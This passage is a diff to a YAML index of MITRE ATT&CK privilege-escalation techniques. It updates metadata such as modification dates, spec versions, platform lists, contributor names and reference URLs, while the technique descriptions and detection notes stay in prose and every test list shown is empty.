       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1547.006
     atomic_tests: []
   T1574.013:
@@ -21326,7 +21640,7 @@ privilege-escalation:
         url: https://docs.microsoft.com/en-us/windows/win32/api/winternl/nf-winternl-ntqueryinformationprocess
         description: Microsoft. (2021, November 23). NtQueryInformationProcess function
           (winternl.h). Retrieved February 4, 2022.
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2022-03-22T15:47:33.915Z'
       name: KernelCallbackTable
       description: |-
         Adversaries may abuse the <code>KernelCallbackTable</code> of a process to hijack its execution flow in order to run their own payloads.(Citation: Lazarus APT January 2022)(Citation: FinFisher exposed ) The <code>KernelCallbackTable</code> can be found in the Process Environment Block (PEB) and is initialized to an array of graphic functions available to a GUI process once <code>user32.dll</code> is loaded.(Citation: Windows Process Injection KernelCallbackTable)
@@ -21352,12 +21666,10 @@ privilege-escalation:
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_data_sources:
       - 'Process: OS API Execution'
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1053.006:
     technique:
-      modified: '2023-09-08T11:56:26.862Z'
+      modified: '2024-10-15T16:42:51.536Z'
       name: 'Scheduled Task/Job: Systemd Timers'
       description: |-
         Adversaries may abuse systemd timers to perform task scheduling for initial or recurring execution of malicious code. Systemd timers are unit files with file extension <code>.timer</code> that control services. Timers can be set to run on a calendar event or after a time span relative to a starting point. They can be used as an alternative to [Cron](https://attack.mitre.org/techniques/T1053/003) in Linux environments.(Citation: archlinux Systemd Timers Aug 2020) Systemd timers may be activated remotely via the <code>systemctl</code> command line utility, which operates over [SSH](https://attack.mitre.org/techniques/T1021/004).(Citation: Systemd Remote Control)
@@ -21435,9 +21747,8 @@ privilege-escalation:
         url: http://man7.org/linux/man-pages/man1/systemd.1.html
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1053.006
     atomic_tests: []
   T1574:
@@ -21504,7 +21815,6 @@ privilege-escalation:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1543.005:
     technique:
@@ -21578,11 +21888,10 @@ privilege-escalation:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1078:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2024-10-15T16:09:46.024Z'
       name: Valid Accounts
       description: |-
         Adversaries may obtain and abuse credentials of existing accounts as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. Compromised credentials may be used to bypass access controls placed on various resources on systems within the network and may even be used for persistent access to remote systems and externally available services, such as VPNs, Outlook Web Access, network devices, and remote desktop.(Citation: volexity_0day_sophos_FW) Compromised credentials may also grant an adversary increased privilege to specific systems or access to restricted areas of the network. Adversaries may choose not to use malware or tools in conjunction with the legitimate access those credentials provide to make it harder to detect their presence.
@@ -21599,7 +21908,6 @@ privilege-escalation:
         phase_name: privilege-escalation
       - kill_chain_name: mitre-attack
         phase_name: initial-access
-      x_mitre_attack_spec_version: 3.1.0
       x_mitre_contributors:
       - Syed Ummar Farooqh, McAfee
       - Prasad Somasamudram, McAfee
@@ -21609,7 +21917,7 @@ privilege-escalation:
       - Netskope
       - Mark Wee
       - Praetorian
-      - Goldstein Menachem
+      - Menachem Goldstein
       x_mitre_deprecated: false
       x_mitre_detection: |-
         Configure robust, consistent account activity audit policies across the enterprise and with externally accessible services.(Citation: TechNet Audit Policy) Look for suspicious account behavior across systems that share accounts, either user, admin, or service accounts. Examples: one account logged into multiple systems simultaneously; multiple accounts logged into the same machine simultaneously; accounts logged in at odd times or outside of business hours. Activity may be from interactive login sessions or process ownership from accounts being used to execute binaries on a remote system as a particular account. Correlate other security systems with login information (e.g., a user has an active login session but has not entered the building or does not have VPN access).
@@ -21618,19 +21926,17 @@ privilege-escalation:
       x_mitre_domains:
       - enterprise-attack
       x_mitre_is_subtechnique: false
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_platforms:
       - Windows
-      - Azure AD
-      - Office 365
       - SaaS
       - IaaS
       - Linux
       - macOS
-      - Google Workspace
       - Containers
       - Network
-      x_mitre_version: '2.6'
+      - Office Suite
+      - Identity Provider
+      x_mitre_version: '2.7'
       x_mitre_data_sources:
       - 'Logon Session: Logon Session Creation'
       - 'User Account: User Account Authentication'
@@ -21678,11 +21984,12 @@ privilege-escalation:
         url: https://technet.microsoft.com/en-us/library/dn487457.aspx
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      spec_version: '2.1'
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
     atomic_tests: []
   T1055.012:
     technique:
-      modified: '2023-08-11T21:37:00.009Z'
+      modified: '2024-09-12T15:11:45.602Z'
       name: 'Process Injection: Process Hollowing'
       description: "Adversaries may inject malicious code into suspended and hollowed
         processes in order to evade process-based defenses. Process hollowing is a
@@ -21750,23 +22057,22 @@ privilege-escalation:
           Retrieved December 7, 2017.'
         url: https://www.endgame.com/blog/technical-blog/ten-process-injection-techniques-technical-survey-common-and-trending-process
       - source_name: Leitch Hollowing
-        description: Leitch, J. (n.d.). Process Hollowing. Retrieved November 12,
-          2014.
-        url: http://www.autosectools.com/process-hollowing.pdf
+        description: Leitch, J. (n.d.). Process Hollowing. Retrieved September 12,
+          2024.
+        url: https://new.dc414.org/wp-content/uploads/2011/01/Process-Hollowing.pdf
       - source_name: Mandiant Endpoint Evading 2019
         description: 'Pena, E., Erikson, C. (2019, October 10). Staying Hidden on
           the Endpoint: Evading Detection with Shellcode. Retrieved November 29, 2021.'
         url: https://www.mandiant.com/resources/staying-hidden-on-the-endpoint-evading-detection-with-shellcode
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1055.012
     atomic_tests: []
   T1068:
     technique:
-      modified: '2023-10-31T14:00:00.188Z'
+      modified: '2023-04-07T17:13:54.168Z'
       name: Exploitation for Privilege Escalation
       description: |-
         Adversaries may exploit software vulnerabilities in an attempt to elevate privileges. Exploitation of a software vulnerability occurs when an adversary takes advantage of a programming error in a program, service, or within the operating system software or kernel itself to execute adversary-controlled code. Security constructs such as permission levels will often hinder access to information and use of certain techniques, so adversaries will likely need to perform privilege escalation to include use of software exploitation to circumvent those restrictions.
@@ -21829,11 +22135,10 @@ privilege-escalation:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1546:
     technique:
-      modified: '2024-03-01T15:49:15.588Z'
+      modified: '2024-10-15T15:57:00.731Z'
       name: Event Triggered Execution
       description: "Adversaries may establish persistence and/or elevate privileges
         using system mechanisms that trigger execution based on specific events. Various
@@ -21886,8 +22191,8 @@ privilege-escalation:
       - Windows
       - SaaS
       - IaaS
-      - Office 365
-      x_mitre_version: '1.3'
+      - Office Suite
+      x_mitre_version: '1.4'
       x_mitre_data_sources:
       - 'Module: Module Load'
       - 'WMI: WMI Creation'
@@ -21935,78 +22240,11 @@ privilege-escalation:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1546
     atomic_tests: []
   T1546.004:
     technique:
-      x_mitre_platforms:
-      - Linux
-      - macOS
-      x_mitre_domains:
-      - enterprise-attack
-      x_mitre_contributors:
-      - Robert Wilson
-      - Tony Lambert, Red Canary
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--b63a34e8-0a61-4c97-a23b-bf8a2ed812e2
-      type: attack-pattern
-      created: '2020-01-24T14:13:45.936Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      external_references:
-      - source_name: mitre-attack
-        external_id: T1546.004
-        url: https://attack.mitre.org/techniques/T1546/004
-      - source_name: intezer-kaiji-malware
-        url: https://www.intezer.com/blog/research/kaiji-new-chinese-linux-malware-turning-to-golang/
-        description: 'Paul Litvak. (2020, May 4). Kaiji: New Chinese Linux malware
-          turning to Golang. Retrieved December 17, 2020.'
-      - source_name: bencane blog bashrc
-        url: https://bencane.com/2013/09/16/understanding-a-little-more-about-etcprofile-and-etcbashrc/
-        description: Benjamin Cane. (2013, September 16). Understanding a little more
-          about /etc/profile and /etc/bashrc. Retrieved February 25, 2021.
-      - source_name: anomali-rocke-tactics
-        url: https://www.anomali.com/blog/illicit-cryptomining-threat-actor-rocke-changes-tactics-now-more-difficult-to-detect
-        description: Anomali Threat Research. (2019, October 15). Illicit Cryptomining
-          Threat Actor Rocke Changes Tactics, Now More Difficult to Detect. Retrieved
-          December 17, 2020.
-      - source_name: Linux manual bash invocation
-        url: https://wiki.archlinux.org/index.php/Bash#Invocation
-        description: ArchWiki. (2021, January 19). Bash. Retrieved February 25, 2021.
-      - source_name: Tsunami
-        url: https://unit42.paloaltonetworks.com/unit42-new-iotlinux-malware-targets-dvrs-forms-botnet/
-        description: Claud Xiao and Cong Zheng. (2017, April 6). New IoT/Linux Malware
-          Targets DVRs, Forms Botnet. Retrieved December 17, 2020.
-      - source_name: anomali-linux-rabbit
-        url: https://www.anomali.com/blog/pulling-linux-rabbit-rabbot-malware-out-of-a-hat
-        description: Anomali Threat Research. (2018, December 6). Pulling Linux Rabbit/Rabbot
-          Malware Out of a Hat. Retrieved December 17, 2020.
-      - source_name: Magento
-        url: https://blog.sucuri.net/2018/05/shell-logins-as-a-magento-reinfection-vector.html
-        description: Cesar Anjos. (2018, May 31). Shell Logins as a Magento Reinfection
-          Vector. Retrieved December 17, 2020.
-      - source_name: ScriptingOSX zsh
-        url: https://scriptingosx.com/2019/06/moving-to-zsh-part-2-configuration-files/
-        description: 'Armin Briegel. (2019, June 5). Moving to zsh, part 2: Configuration
-          Files. Retrieved February 25, 2021.'
-      - source_name: PersistentJXA_leopitt
-        url: https://posts.specterops.io/persistent-jxa-66e1c3cd1cf5
-        description: Leo Pitt. (2020, August 6). Persistent JXA - A poor man's Powershell
-          for macOS. Retrieved January 11, 2021.
-      - source_name: code_persistence_zsh
-        url: https://github.com/D00MFist/PersistentJXA/blob/master/BashProfilePersist.js
-        description: Leo Pitt. (2020, November 11). Github - PersistentJXA/BashProfilePersist.js.
-          Retrieved January 11, 2021.
-      - source_name: macOS MS office sandbox escape
-        url: https://cedowens.medium.com/macos-ms-office-sandbox-brain-dump-4509b5fed49a
-        description: Cedric Owens. (2021, May 22). macOS MS Office Sandbox Brain Dump.
-          Retrieved August 20, 2021.
-      - source_name: ESF_filemonitor
-        url: https://objective-see.com/blog/blog_0x48.html
-        description: Patrick Wardle. (2019, September 17). Writing a File Monitor
-          with Apple's Endpoint Security Framework. Retrieved December 17, 2020.
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2024-09-25T15:02:24.143Z'
       name: 'Event Triggered Execution: .bash_profile .bashrc and .shrc'
       description: "Adversaries may establish persistence through executing malicious
         commands triggered by a user’s shell. User [Unix Shell](https://attack.mitre.org/techniques/T1059/004)s
@@ -22054,6 +22292,10 @@ privilege-escalation:
         phase_name: privilege-escalation
       - kill_chain_name: mitre-attack
         phase_name: persistence
+      x_mitre_contributors:
+      - Robert Wilson
+      - Tony Lambert, Red Canary
+      x_mitre_deprecated: false
       x_mitre_detection: "While users may customize their shell profile files, there
         are only certain types of commands that typically appear in these files. Monitor
         for abnormal commands such as execution of unknown programs, opening network
@@ -22064,9 +22306,13 @@ privilege-escalation:
         events monitoring these specific files.(Citation: ESF_filemonitor) \n\nFor
         most Linux and macOS systems, a list of file paths for valid shell options
         available on a system are located in the <code>/etc/shells</code> file.\n"
+      x_mitre_domains:
+      - enterprise-attack
       x_mitre_is_subtechnique: true
+      x_mitre_platforms:
+      - Linux
+      - macOS
       x_mitre_version: '2.1'
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_data_sources:
       - 'Process: Process Creation'
       - 'File: File Creation'
@@ -22075,8 +22321,67 @@ privilege-escalation:
       x_mitre_permissions_required:
       - User
       - Administrator
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
+      type: attack-pattern
+      id: attack-pattern--b63a34e8-0a61-4c97-a23b-bf8a2ed812e2
+      created: '2020-01-24T14:13:45.936Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1546/004
+        external_id: T1546.004
+      - source_name: anomali-linux-rabbit
+        description: Anomali Threat Research. (2018, December 6). Pulling Linux Rabbit/Rabbot
+          Malware Out of a Hat. Retrieved December 17, 2020.
+        url: https://www.anomali.com/blog/pulling-linux-rabbit-rabbot-malware-out-of-a-hat
+      - source_name: anomali-rocke-tactics
+        description: Anomali Threat Research. (2019, October 15). Illicit Cryptomining
+          Threat Actor Rocke Changes Tactics, Now More Difficult to Detect. Retrieved
+          December 17, 2020.
+        url: https://www.anomali.com/blog/illicit-cryptomining-threat-actor-rocke-changes-tactics-now-more-difficult-to-detect
+      - source_name: Linux manual bash invocation
+        description: ArchWiki. (2021, January 19). Bash. Retrieved February 25, 2021.
+        url: https://wiki.archlinux.org/index.php/Bash#Invocation
+      - source_name: ScriptingOSX zsh
+        description: 'Armin Briegel. (2019, June 5). Moving to zsh, part 2: Configuration
+          Files. Retrieved February 25, 2021.'
+        url: https://scriptingosx.com/2019/06/moving-to-zsh-part-2-configuration-files/
+      - source_name: bencane blog bashrc
+        description: Benjamin Cane. (2013, September 16). Understanding a little more
+          about /etc/profile and /etc/bashrc. Retrieved September 25, 2024.
+        url: https://web.archive.org/web/20220316014323/http://bencane.com/2013/09/16/understanding-a-little-more-about-etcprofile-and-etcbashrc/
+      - source_name: macOS MS office sandbox escape
+        description: Cedric Owens. (2021, May 22). macOS MS Office Sandbox Brain Dump.
+          Retrieved August 20, 2021.
+        url: https://cedowens.medium.com/macos-ms-office-sandbox-brain-dump-4509b5fed49a
+      - source_name: Magento
+        description: Cesar Anjos. (2018, May 31). Shell Logins as a Magento Reinfection
+          Vector. Retrieved December 17, 2020.
+        url: https://blog.sucuri.net/2018/05/shell-logins-as-a-magento-reinfection-vector.html
+      - source_name: Tsunami
+        description: Claud Xiao and Cong Zheng. (2017, April 6). New IoT/Linux Malware
+          Targets DVRs, Forms Botnet. Retrieved December 17, 2020.
+        url: https://unit42.paloaltonetworks.com/unit42-new-iotlinux-malware-targets-dvrs-forms-botnet/
+      - source_name: PersistentJXA_leopitt
+        description: Leo Pitt. (2020, August 6). Persistent JXA - A poor man's Powershell
+          for macOS. Retrieved January 11, 2021.
+        url: https://posts.specterops.io/persistent-jxa-66e1c3cd1cf5
+      - source_name: code_persistence_zsh
+        description: Leo Pitt. (2020, November 11). Github - PersistentJXA/BashProfilePersist.js.
+          Retrieved January 11, 2021.
+        url: https://github.com/D00MFist/PersistentJXA/blob/master/BashProfilePersist.js
+      - source_name: ESF_filemonitor
+        description: Patrick Wardle. (2019, September 17). Writing a File Monitor
+          with Apple's Endpoint Security Framework. Retrieved December 17, 2020.
+        url: https://objective-see.com/blog/blog_0x48.html
+      - source_name: intezer-kaiji-malware
+        description: 'Paul Litvak. (2020, May 4). Kaiji: New Chinese Linux malware
+          turning to Golang. Retrieved December 17, 2020.'
+        url: https://www.intezer.com/blog/research/kaiji-new-chinese-linux-malware-turning-to-golang/
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       identifier: T1546.004
     atomic_tests: []
   T1134.005:
@@ -22122,7 +22427,7 @@ privilege-escalation:
         description: Microsoft. (n.d.). Using DsAddSidHistory. Retrieved November
           30, 2017.
         source_name: Microsoft DsAddSidHistory
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2021-02-09T15:49:58.414Z'
       name: 'Access Token Manipulation: SID-History Injection'
       description: |-
         Adversaries may use SID-History Injection to escalate privileges and bypass access controls. The Windows security identifier (SID) is a unique value that identifies a user or group account. SIDs are used by Windows security in both security descriptors and access tokens. (Citation: Microsoft SID) An account can hold additional SIDs in the SID-History Active Directory attribute (Citation: Microsoft SID-History Attribute), allowing inter-operable account migration between domains (e.g., all values in SID-History are included in access tokens).
@@ -22147,13 +22452,11 @@ privilege-escalation:
       x_mitre_permissions_required:
       - Administrator
       - SYSTEM
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
       identifier: T1134.005
     atomic_tests: []
   T1548.004:
     technique:
-      modified: '2022-11-08T14:00:00.188Z'
+      modified: '2022-10-19T16:35:18.492Z'
       name: Elevated Execution with Prompt
       description: "Adversaries may leverage the <code>AuthorizationExecuteWithPrivileges</code>
         API to escalate privileges by prompting the user for credentials.(Citation:
@@ -22233,7 +22536,6 @@ privilege-escalation:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1547.002:
     technique:
@@ -22269,7 +22571,7 @@ privilege-escalation:
         Adversaries may abuse authentication packages to execute DLLs when the system boots. Windows authentication package DLLs are loaded by the Local Security Authority (LSA) process at system start. They provide support for multiple logon processes and multiple security protocols to the operating system.(Citation: MSDN Authentication Packages)
 
         Adversaries can use the autostart mechanism provided by LSA authentication packages for persistence by placing a reference to a binary in the Windows Registry location <code>HKLM\SYSTEM\CurrentControlSet\Control\Lsa\</code> with the key value of <code>"Authentication Packages"=&lt;target binary&gt;</code>. The binary will then be executed by the system when the authentication packages are loaded.
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2022-04-20T16:29:36.291Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       name: Authentication Package
       x_mitre_detection: 'Monitor the Registry for changes to the LSA Registry keys.
@@ -22292,12 +22594,11 @@ privilege-escalation:
       - Administrator
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1547.002
     atomic_tests: []
   T1546.015:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2023-04-21T12:34:29.402Z'
       name: 'Event Triggered Execution: Component Object Model Hijacking'
       description: "Adversaries may establish persistence by executing malicious content
         triggered by hijacked references to Component Object Model (COM) objects.
@@ -22375,12 +22676,11 @@ privilege-escalation:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1546.015
     atomic_tests: []
   T1574.009:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2023-03-30T21:01:35.788Z'
       name: 'Hijack Execution Flow: Path Interception by Unquoted Path'
       description: |-
         Adversaries may execute their own malicious payloads by hijacking vulnerable file path references. Adversaries can take advantage of paths that lack surrounding quotations by placing an executable in a higher level directory within the path, so that Windows will choose the adversary's executable to launch.
@@ -22441,7 +22741,6 @@ privilege-escalation:
         url: https://docs.microsoft.com/en-us/windows-hardware/drivers/install/hklm-system-currentcontrolset-services-registry-tree
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      spec_version: '2.1'
       identifier: T1574.009
     atomic_tests: []
   T1037.005:
@@ -22485,7 +22784,7 @@ privilege-escalation:
         mechanism.(Citation: Methods of Mac Malware Persistence) Additionally, since
         StartupItems run during the bootup phase of macOS, they will run as the elevated
         root user."
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2022-04-20T16:43:21.560Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       name: 'Boot or Logon Initialization Scripts: Startup Items'
       x_mitre_detection: |-
@@ -22507,7 +22806,6 @@ privilege-escalation:
       - Administrator
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1037.005
     atomic_tests: []
   T1078.002:
@@ -22588,7 +22886,6 @@ privilege-escalation:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1037.003:
     technique:
@@ -22611,7 +22908,7 @@ privilege-escalation:
         description: Daniel Petri. (2009, January 8). Setting up a Logon Script through
           Active Directory Users and Computers in Windows Server 2008. Retrieved November
           15, 2019.
-      modified: '2021-04-29T14:49:39.188Z'
+      modified: '2020-03-24T23:45:25.625Z'
       name: Network Logon Script
       description: "Adversaries may use network logon scripts automatically executed
         at logon initialization to establish persistence. Network logon scripts can
@@ -22641,12 +22938,10 @@ privilege-escalation:
       - 'File: File Modification'
       - 'Process: Process Creation'
       - 'File: File Creation'
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1546.010:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2023-04-21T12:33:45.568Z'
       name: 'Event Triggered Execution: AppInit DLLs'
       description: "Adversaries may establish persistence and/or elevate privileges
         by executing malicious content triggered by AppInit DLLs loaded into processes.
@@ -22731,7 +23026,6 @@ privilege-escalation:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1546.010
     atomic_tests: []
   T1546.002:
@@ -22796,7 +23090,6 @@ privilege-escalation:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1546.002
     atomic_tests: []
   T1543.001:
@@ -22871,7 +23164,7 @@ privilege-escalation:
         benign software. Launch Agents are created with user level privileges and
         execute with user level permissions.(Citation: OSX Malware Detection)(Citation:
         OceanLotus for OS X) "
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2022-04-21T16:13:00.598Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       name: 'Create or Modify System Process: Launch Agent'
       x_mitre_detection: "Monitor Launch Agent creation through additional plist files
@@ -22899,7 +23192,6 @@ privilege-escalation:
       - User
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1543.001
     atomic_tests: []
   T1055.009:
@@ -22930,7 +23222,7 @@ privilege-escalation:
         url: http://man7.org/linux/man-pages/man1/dd.1.html
         description: Kerrisk, M. (2020, February 2). DD(1) User Commands. Retrieved
           February 21, 2020.
-      modified: '2021-04-29T14:49:39.188Z'
+      modified: '2020-06-20T22:25:55.331Z'
       name: Proc Memory
       description: "Adversaries may inject malicious code into processes via the /proc
         filesystem in order to evade process-based defenses as well as possibly elevate
@@ -22973,12 +23265,10 @@ privilege-escalation:
       x_mitre_defense_bypassed:
       - Application control
       - Anti-virus
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1546.016:
     technique:
-      modified: '2024-04-12T02:23:44.583Z'
+      modified: '2024-04-28T15:52:44.332Z'
       name: Installer Packages
       description: |-
         Adversaries may establish persistence and elevate privileges by using an installer to trigger the execution of malicious content. Installer packages are OS specific and contain the resources an operating system needs to install applications on a system. Installer packages can include scripts that run prior to installation as well as after installation is complete. Installer scripts may inherit elevated permissions when executed. Developers often use these scripts to prepare the environment for installation, check requirements, download dependencies, and remove files after installation.(Citation: Installer Package Scripting Rich Trouton)
@@ -22995,7 +23285,7 @@ privilege-escalation:
         phase_name: persistence
       x_mitre_contributors:
       - Brandon Dalton @PartyD0lphin
-      - Alexander Rodchenko
+      - Rodchenko Aleksandr
       x_mitre_deprecated: false
       x_mitre_detection: ''
       x_mitre_domains:
@@ -23054,7 +23344,6 @@ privilege-escalation:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1037.004:
     technique:
@@ -23136,12 +23425,11 @@ privilege-escalation:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1037.004
     atomic_tests: []
   T1134:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2023-03-30T21:01:47.762Z'
       name: Access Token Manipulation
       description: |-
         Adversaries may modify access tokens to operate under a different user or system security context to perform actions and bypass access controls. Windows uses access tokens to determine the ownership of a running process. A user can manipulate access tokens to make a running process appear as though it is the child of a different process or belongs to someone other than the user that started the process. When this occurs, the process also takes on the security context associated with the new token.
@@ -23238,7 +23526,6 @@ privilege-escalation:
         url: https://pentestlab.blog/2017/04/03/token-manipulation/
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      spec_version: '2.1'
     atomic_tests: []
   T1543.002:
     technique:
@@ -23352,7 +23639,6 @@ privilege-escalation:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1543.002
     atomic_tests: []
   T1547.013:
@@ -23422,7 +23708,6 @@ privilege-escalation:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1055.005:
     technique:
@@ -23450,7 +23735,7 @@ privilege-escalation:
           A Technical Survey Of Common And Trending Process Injection Techniques.
           Retrieved December 7, 2017.'
         source_name: Elastic Process Injection July 2017
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2021-10-18T12:24:54.198Z'
       name: Thread Local Storage
       description: "Adversaries may inject malicious code into processes via thread
         local storage (TLS) callbacks in order to evade process-based defenses as
@@ -23494,8 +23779,6 @@ privilege-escalation:
       x_mitre_defense_bypassed:
       - Anti-virus
       - Application control
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1547.007:
     technique:
@@ -23531,7 +23814,7 @@ privilege-escalation:
         Adversaries may modify plist files to automatically run an application when a user logs in. When a user logs out or restarts via the macOS Graphical User Interface (GUI), a prompt is provided to the user with a checkbox to "Reopen windows when logging back in".(Citation: Re-Open windows on Mac) When selected, all applications currently open are added to a property list file named <code>com.apple.loginwindow.[UUID].plist</code> within the <code>~/Library/Preferences/ByHost</code> directory.(Citation: Methods of Mac Malware Persistence)(Citation: Wardle Persistence Chapter) Applications listed in this file are automatically reopened upon the user’s next logon.
 
         Adversaries can establish [Persistence](https://attack.mitre.org/tactics/TA0003) by adding a malicious application path to the <code>com.apple.loginwindow.[UUID].plist</code> file to execute payloads when a user logs in.
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2022-04-19T23:46:56.443Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       name: 'Boot or Logon Autostart Execution: Re-opened Applications'
       x_mitre_detection: Monitoring the specific plist files associated with reopening
@@ -23550,12 +23833,11 @@ privilege-escalation:
       - User
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1547.007
     atomic_tests: []
   T1574.002:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2023-03-30T21:01:47.241Z'
       name: 'Hijack Execution Flow: DLL Side-Loading'
